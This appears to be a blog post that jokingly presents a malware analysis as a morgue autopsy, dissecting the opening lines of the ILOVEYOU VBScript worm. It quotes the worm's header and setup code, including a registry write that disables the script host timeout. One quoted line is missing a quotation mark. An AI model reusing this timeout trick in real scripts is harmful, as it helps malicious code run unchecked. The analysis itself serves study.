virus autopsy: ILOVEYOU, part 1

*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, recieved as an attachment and requiring a manual launch by the user to activate.

scalpel. thorax incision reveals...

001 rem barok -loveletter(vbe) (i hate go to school)
002 rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines
004 On Error Resume Next
005 dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy
007 eq = ""
008 ctr = 0
009 set fso = CreateObject("Scripting.FileSystemObject")
010 set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
011 vbscopy = file.ReadAll
ach, handkerchief. handkerchief! thankyou nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them just to read the filesystem... i'll remove them and go under the ribcage.
013 main()
015 sub main()
016 On Error Resume Next
017 dim wscr,rr
018 set wscr=CreateObject("WScript.Shell")
019 ' checks the time out of Windows scripting host
020 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
021 if (rr>=1) then
022 ' change the script to endless:
023 wscr.RegWrite(HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD")
024 end if
alright, hold it there, nurse. you see that? the thing's setting the Windows Scripting virtual machine's timeout to zero, to stop it from timing out and exiting before the script is finished. devious, but not devious enough... i think we're done for tonight, nurse.

next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.

